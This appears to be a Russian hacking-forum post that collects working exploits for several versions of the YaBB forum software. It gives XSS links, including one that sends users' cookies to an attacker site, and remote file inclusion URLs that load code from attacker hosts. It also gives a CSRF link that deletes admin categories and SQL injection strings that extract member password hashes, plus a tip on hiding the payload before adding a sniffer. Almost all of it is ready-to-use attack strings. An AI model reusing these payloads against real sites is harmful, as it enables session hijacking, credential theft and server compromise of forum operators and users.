YaBB 1 Gold Уязвимость в YaBB(http://www.yabb.org/) позволяет удаленному пользователю вставлять произвольный код сценария в страницы сообщения об ошибках. Уязвимость может использоваться для кражи опознавательных мандатов пользователей YaBB, хранящихся в куки. Код: http://some.site.com/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=< script>alert()< / script> Описание:атакующий может сконструировать специальную ссылку, содержащую произвольный код сценария, при клике на которую код будет выполнен в браузере пользователя, кликнувшего на эту ссылку Код: http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; num=10360245269 YaBB 1.2 Код: http://site.com/yapBB/include/global.php?GLOBAL[includeBit]=1&cfgIncludeDirectory=http://attacer.com/ Код вставки : PHP код: Видео: http://video.antichat.ru/download_183.html YaBB 1.3.2 Описание: Злонамеренный пользователь может опубликовать сообщение, содержащее изображение, которое ссылается на URL, используемый при выполнении административных действий. В результате административное действие будет автоматически выполнено, когда администратор читает сообщения форума. Код: http://[victim]/YaBB.pl?board=;action=modifycat;id=[cateogoryname];moda=Remove2 YaBB 1.4.0-1.4.1 Описание: Межсайтовый скрптинг обнаружен в сценарии входа в систему Код: http://example.com/forums/index.php? board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD< script> window.location.href(%22http://www.attackersite.example.com/hack.asp?%22%2Bdocument.cookie)< / script> Код: http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; num=10360245269 SQL Описание:Проблема обнаружена в сценарии Reminder.php. Код: http://www.myserver.com/yabbse/Reminder.php? searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername] YaBB SE 1.5.1 Описание: Удаленный пользователь может выполнить XSS нападение. Код: YaBB SE 1.5.5c Описание: Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии Sources/Profile.php Возможность выполнять SQL команды в базе данных: Код: http://[host]/index.php?board=&action=viewprofile&user=[code] YaBB SE 1.5.4, 1.5.5 Описание: Уязвимость обнаружена в параметре 'quote' Код: http://localhost:8080/yabbse//inde x.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f 2;action=post;threadid=1;title=Post+reply; quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ull,null,null+FROM+ yabbse_members+where+ID_ME YaBB SE 1.5.4, 1.5.3 SQL injection Описание: Уязвимость обнаружена в YaBB SE в 'SSI.php'. Код: http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2) +LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+ lmr.ID_MEN+SELECT+ID_MEMBER,+ memberName,null,passwd,null,passwd,null,null,null, null,null,null+ FROM+yabbse_members+/* Код: http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1) +LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+lmr.ID_ME ull,null+FROM+yabbse_members+/* Код: http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+A SCII(SUBSTRING(realName,1,1)+)+ Эксплоит: http://kolokol.ho.com.ua/exploit YaBB 2 XSS Код: YaBB SE SQL Error + XSS(passive 3шт.) Код: http://site/forum/index.php?board=' Код: http://site/forum/index.php?board=1;action=display;threadid=' Код: http://site/forum< script>alert()< / script> Код: http://site/forumindex.php?board=1;action=icqpager;UIN=< script>alert()< / script> Код: http://site/forumindex.php?board=1;action=post;threadid=1;quote=2;title=net< script>alert("Sn@k3")< / script> (меняем заголовок страницы на "net" и закрывает тэг заголовка. так мы не светимся. а дальше скрипт для сниффера - как всегда) Описание:Файл 'Packages.php' включает сценарий 'Packer.php Код: http://[target]/yabbse/Sources/Packages.php?sourcedir=http://attacker/
|